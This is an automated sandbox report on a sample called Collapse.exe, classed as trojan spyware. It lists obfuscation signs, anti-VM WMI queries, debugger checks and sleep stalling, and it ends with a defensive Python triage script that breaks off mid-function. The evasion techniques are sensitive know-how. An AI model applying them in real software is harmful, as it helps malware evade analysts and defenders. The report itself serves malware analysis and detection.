Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042D8A7
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00417910
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0040B920
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044F1E0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004129EA
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042E2B1
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0040EB1E
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042C380
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044A460
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042D4EA
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044FE40
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00429E30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004316C0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041AF10
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041BF19
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004467F0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00401040
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042E850
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041C853
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042D01E
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042A830
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044B030
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041D0DE
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004370F0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004378F0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00447940
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043A14C
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00425100
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00439113
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00448110
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043491D
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00424120
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043A93A
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043A1CB
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004329D3
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004259D0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043E9D0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004411E0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043D1B7
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043A1B4
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00408A40
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0040A220
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00444A28
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00402AC0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00416ADA
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044FAE0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00445AE0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0040CA90
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004302A0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044EAA2
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042EB50
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043AB70
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00424B10
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044E320
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00427B29
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044AB30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00428337
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00434BF0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043DBA1
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00430BA0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00409440
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044E410
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0040BC30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00421C30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00423C35
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004034F0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004174F3
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00431CF0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041CC8B
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004454AA
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00407D40
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00445D40
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041FD48
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00434500
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043CD1E
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00441520
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042ED31
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00448539
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042FDC0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00426DD0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0040C590
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044DD96
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00424DA0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00412DA2
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043564C
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00434E76
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044BE0B
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042AE30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00431ED1
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00438681
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00403E90
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043C697
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004246A4
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00408EB0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044CE16
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00443F4A
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041BF63
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041D766
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00404772
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00406F76
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00425710
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00421724
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0042C73A
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00439FCB
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00433FCC
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041E7D4
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0040EFE0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044A7E0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0040F7E7
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00428FF0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004407F3
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044F780
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00410790
Source: C:\Users\user\Desktop\Collapse.exe | Code function: String function: 0041AF00 appears 91 times
Source: C:\Users\user\Desktop\Collapse.exe | Code function: String function: 0040B210 appears 46 times
Source: C:\Users\user\Desktop\Collapse.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 924
Source: Collapse.exe, 00000000.00000000.2033784220.0000000000F50000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePolitic.exe0 vs Collapse.exe
Source: Collapse.exe, 00000000.00000002.2232010629.00000000016DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Collapse.exe
Source: Collapse.exe, 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePolitic.exe0 vs Collapse.exe
Source: Collapse.exe | Binary or memory string: OriginalFilenamePolitic.exe0 vs Collapse.exe
Source: Collapse.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Collapse.exe | Static PE information: Section: .CSS ZLIB complexity 1.0003250730742779
Source: Collapse.exe, ppuPHebcoIQOPplcqD.cs | Cryptographic APIs: 'CreateDecryptor' (2 occurrences)
Source: 0.2.Collapse.exe.42f9550.0.raw.unpack, ppuPHebcoIQOPplcqD.cs | Cryptographic APIs: 'CreateDecryptor' (2 occurrences)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/5@2/2
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_004467F0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW | 1_2_004467F0
Source: C:\Users\user\Desktop\Collapse.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4760
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\6b1c9201-6c7f-4345-a484-62783186cdcd
Source: Collapse.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Collapse.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Collapse.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Collapse.exe | Virustotal: Detection: 55%
Source: C:\Users\user\Desktop\Collapse.exe | File read: C:\Users\user\Desktop\Collapse.exe
Source: unknown | Process created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"
Source: C:\Users\user\Desktop\Collapse.exe | Process created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe" (2 occurrences)
Source: C:\Users\user\Desktop\Collapse.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 924
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: kernel.appcore.dll (2 occurrences)
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: version.dll (2 occurrences)
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: ucrtbase_clr0400.dll (2 occurrences)
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: windows.storage.dll (2 occurrences)
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: wldp.dll (2 occurrences)
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: ondemandconnroutehelper.dll (8 occurrences)
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Collapse.exe | Section loaded: profapi.dll
Source: Collapse.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Collapse.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Collapse.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Politic.pdb source: Collapse.exe, WER6334.tmp.dmp.4.dr
Source: Binary string: System.Windows.Forms.pdb source: WER6334.tmp.dmp.4.dr
Source: Binary string: mscorlib.pdb source: WER6334.tmp.dmp.4.dr
Source: Binary string: System.ni.pdbRSDS source: WER6334.tmp.dmp.4.dr
Source: Binary string: Politic.pdb$FXn source: WER6334.tmp.dmp.4.dr
Source: Binary string: mscorlib.ni.pdb source: WER6334.tmp.dmp.4.dr
Source: Binary string: System.pdb) source: WER6334.tmp.dmp.4.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER6334.tmp.dmp.4.dr
Source: Binary string: System.ni.pdb source: WER6334.tmp.dmp.4.dr
Source: Binary string: System.pdb source: WER6334.tmp.dmp.4.dr

Data Obfuscation

Source: Collapse.exe, ppuPHebcoIQOPplcqD.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Collapse.exe.42f9550.0.raw.unpack, ppuPHebcoIQOPplcqD.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: Collapse.exe | Static PE information: 0xAFA985D8 [Wed May 23 05:10:48 2063 UTC]
Source: Collapse.exe | Static PE information: section name: .CSS
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00454118 push esi; iretd | 1_2_00454119
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043FC59 push es; iretd | 1_2_0043FC88
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0045240C push es; ret | 1_2_0045240E
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0043D744 push ecx; ret | 1_2_0043D745
Source: Collapse.exe, ppuPHebcoIQOPplcqD.cs | High entropy of concatenated method names: 'ykGPwgHwAO', 'nW4lBacjpc', 'B2KP3xokPn', 'gaTPYwoJ5G', 'TYLPxbKoYW', 'kO0PvR7N8F', 'U7V1BKO3PY', 'wWfQ2gHoY', 'yC1fpnZwL', 'Hw60rhVR9'
Source: Collapse.exe, qOk4Li1LtD7jcpHmh1s.cs | High entropy of concatenated method names: 'DOy1h9YEcI', 'idX1TUKobN', 'LiV1FpfZt0', 'i701KaU8Po', 'LUk1Dtqt7k', 'tWR1uNYEvx', 'drh1mtIfRg', 'toM1GSPObS', 'iMU1WPi3w9', 'tnJ146DGBh'
Source: 0.2.Collapse.exe.42f9550.0.raw.unpack, ppuPHebcoIQOPplcqD.cs | High entropy of concatenated method names: 'ykGPwgHwAO', 'nW4lBacjpc', 'B2KP3xokPn', 'gaTPYwoJ5G', 'TYLPxbKoYW', 'kO0PvR7N8F', 'U7V1BKO3PY', 'wWfQ2gHoY', 'yC1fpnZwL', 'Hw60rhVR9'
Source: 0.2.Collapse.exe.42f9550.0.raw.unpack, qOk4Li1LtD7jcpHmh1s.cs | High entropy of concatenated method names: 'DOy1h9YEcI', 'idX1TUKobN', 'LiV1FpfZt0', 'i701KaU8Po', 'LUk1Dtqt7k', 'tWR1uNYEvx', 'drh1mtIfRg', 'toM1GSPObS', 'iMU1WPi3w9', 'tnJ146DGBh'
Source: C:\Users\user\Desktop\Collapse.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\Collapse.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Collapse.exe | Process information set: NOOPENFILEERRORBOX (21 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (21 occurrences)
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: C:\Users\user\Desktop\Collapse.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\Collapse.exe | System information queried: FirmwareTableInformation
                          Source: C:\Users\user\Desktop\Collapse.exe | Memory allocated: 1910000 memory reserve|memory write watch
                          Source: C:\Users\user\Desktop\Collapse.exe | Memory allocated: 32F0000 memory reserve|memory write watch
                          Source: C:\Users\user\Desktop\Collapse.exe | Memory allocated: 52F0000 memory reserve|memory write watch
                          Source: C:\Users\user\Desktop\Collapse.exe | Window / User API: threadDelayed 6569
                          Source: C:\Users\user\Desktop\Collapse.exe TID: 6252 | Thread sleep time: -180000s >= -30000s
                          Source: C:\Users\user\Desktop\Collapse.exe TID: 7544 | Thread sleep count: 6569 > 30
                          Source: C:\Users\user\Desktop\Collapse.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\Desktop\Collapse.exe | Last function: Thread delayed (2 occurrences)
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Collapse.exe, 00000001.00000002.3295169809.00000000016AC000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                          Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
                          Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
                          Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Users\user\Desktop\Collapse.exe | API call chain: ExitProcess graph end node (graph_1-22591)
                          Source: C:\Users\user\Desktop\Collapse.exe | Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\Collapse.exe | Process queried: DebugPort (2 occurrences)
                          Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0044C900 LdrInitializeThunk
                          Source: C:\Users\user\Desktop\Collapse.exe | Code function: 0_2_032F58D1 mov edi, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\Collapse.exe | Code function: 0_2_032F5A4E mov edi, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\Collapse.exe | Memory allocated: page read and write|page guard
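
Editor's note, added example (not part of the Joe Sandbox report and not the sample's code): the signatures above fall into four evasion families. Hypervisor fingerprinting through WMI (Win32_VideoController and Win32_BIOS rows carry vendor strings such as the VMware BIOS entry visible in Amcache), a firmware-table query (SMBIOS/ACPI tables expose the same vendor data without WMI), debugger checks (ProcessDebugPort queries and PEB reads through fs:[30h]), and sleep-based stalling (one 180 s delay on one thread, 6569 short delays on another). The Python below runs that triage logic over a constructed trace. The event schema, the thresholds, and the reading of the report's -180000 as a 180 s relative NtDelayExecution interval are assumptions of the example.

```python
"""Score sandbox- and debugger-evasion behaviour from an ordered API trace.

Added example. The trace format is a constructed, simplified event list
modelled on the report's signatures; field names and thresholds are assumed.
"""
from dataclasses import dataclass, field

# NtDelayExecution takes a LARGE_INTEGER in 100-nanosecond units. A negative
# value means "relative to now", which is why sandbox reports print sleeps
# as negative numbers.
HUNDRED_NS_PER_MS = 10_000


def delay_interval_to_ms(interval: int) -> float:
    """Convert a relative NtDelayExecution DelayInterval to milliseconds."""
    if interval > 0:
        raise ValueError("absolute (positive) delay intervals are not handled here")
    return -interval / HUNDRED_NS_PER_MS


# WMI classes whose rows expose hypervisor vendor strings (VMware, VBox, Hyper-V...)
VM_FINGERPRINT_CLASSES = {"win32_videocontroller", "win32_bios", "win32_computersystem",
                          "win32_diskdrive", "win32_baseboard"}

LONG_SLEEP_MS = 30_000    # one sleep of >= 30 s is a stalling indicator (assumed threshold)
SLEEP_LOOP_COUNT = 30     # more than 30 sleeps on one thread is a stalling loop (assumed threshold)


@dataclass
class EvasionFindings:
    vm_wmi_classes: set = field(default_factory=set)
    firmware_table_query: bool = False
    debug_port_queries: int = 0
    peb_reads: int = 0
    longest_sleep_ms: float = 0.0
    sleeps_per_thread: dict = field(default_factory=dict)

    def indicators(self) -> list:
        out = []
        if self.vm_wmi_classes:
            out.append("wmi_hardware_fingerprint:" + ",".join(sorted(self.vm_wmi_classes)))
        if self.firmware_table_query:
            out.append("firmware_table_query")
        if self.debug_port_queries:
            out.append("debugger_check:ProcessDebugPort")
        if self.peb_reads:
            out.append("peb_access")
        if self.longest_sleep_ms >= LONG_SLEEP_MS:
            out.append("long_sleep")
        if any(n > SLEEP_LOOP_COUNT for n in self.sleeps_per_thread.values()):
            out.append("sleep_loop")
        return out


def analyse_trace(events) -> EvasionFindings:
    f = EvasionFindings()
    for ev in events:
        kind = ev["api"]
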